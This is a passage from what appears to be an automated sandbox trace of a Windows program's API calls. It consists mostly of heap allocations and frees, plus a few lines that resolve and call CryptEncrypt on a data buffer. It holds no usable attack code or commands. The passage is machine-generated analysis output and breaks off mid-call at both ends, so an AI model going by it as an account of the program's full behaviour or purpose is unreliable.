hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea5d30 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb8a30 | out: hHeap=0x970000) returned 1 [0211.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0211.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0211.609] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0211.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0211.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0211.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12cf6) returned 0x2ea5d30 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea5d30 | out: hHeap=0x970000) returned 1 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0211.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0211.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0211.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509c8 [0211.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.620] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e544e0 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.621] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e93030*, pdwDataLen=0x8cef60*=0x12cf6, dwBufLen=0x12cf8 | out: pbData=0x2e93030*, pdwDataLen=0x8cef60*=0x12cf8) returned 1 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0211.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.663] RtlAllocateHeap (HeapHandle=0x970000, 